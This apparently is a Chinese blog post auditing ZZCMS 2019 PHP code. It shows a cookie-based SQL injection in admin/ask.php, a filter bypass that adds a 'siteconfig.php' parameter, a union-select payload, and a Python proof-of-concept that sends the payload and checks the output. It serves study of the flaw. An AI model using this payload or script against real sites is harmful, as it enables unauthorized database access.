PHP代码审计ZZCMS2019之cookie注入

1. cookie注入的主要文件 admin/ask.php

在这里插入图片描述
进入ask.php文件,如图所标志cookie这个参数直接写到了sql语句中,可以初步判定可能存在sql注入漏洞,要想执行此处的sql语句自然是要调用相应的方法的,该sql的对应方法是add,通过调用add方法才能执行到上图中的代码,这里不多讲,直接找到调用add函数的位置。

2. 寻找执行注入语句的方法

在这里插入图片描述
成功找到调用add方法的代码,此处的逻辑只需要在get请求中加入do参数并赋值为add则会自动调用add方法

3. 使用burp联动phpstorm调试代码

一、通过do=add进入add方法

在这里插入图片描述

二、在cookie中写入恶意语句

在这里插入图片描述
传入恶意的SQL语句:

#联合注入
-1+union+select+user(),2,3,4,5,6,7,8,9,10,11

ZZCMS数据库默认是11个字段这里直接写payload
跟进内部存在cookie的过滤,过滤的逻辑中存在绕过。

if (strpos($r_url,"siteconfig.php")==0 && strpos($r_url,"label")==0 && strpos($r_url,"template.php")==0)

绕过如上代码可直接不执行过滤,绕过方式在burp的url中任意添加一个变量参数定义为siteconfig.php直接绕过逻辑判断。
在这里插入图片描述

4. 最终的SQL语句

在这里插入图片描述
漏洞验证:
在这里插入图片描述

5.根据大佬思路写的POC验证脚本

该脚本仅供学习参考

import re
import requests
from bs4 import BeautifulSoup

geturl = "http://www.zzcms.com"
head = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
}
cookie = {
    "askbigclassid": "-1+union+select+user(),2,3,4,5,6,7,8,9,10,11"
}
url = geturl+"/admin/ask.php?do=add&a=siteconfig.php"
try:
    Geturl = requests.get(url=url, cookies=cookie, headers=head) #设置url参数
    soup = BeautifulSoup(Geturl.text, "lxml")
    t = soup.find_all("option")[2]
    test = str(t)
    a = re.search(r"<option value=(.*)>3</option>", test).group(1)
    if a == '\"root@localhost\"':
        print("存在注入:", a.replace("\"", ""))
except:
    print("不存在")
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

让我在看看

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值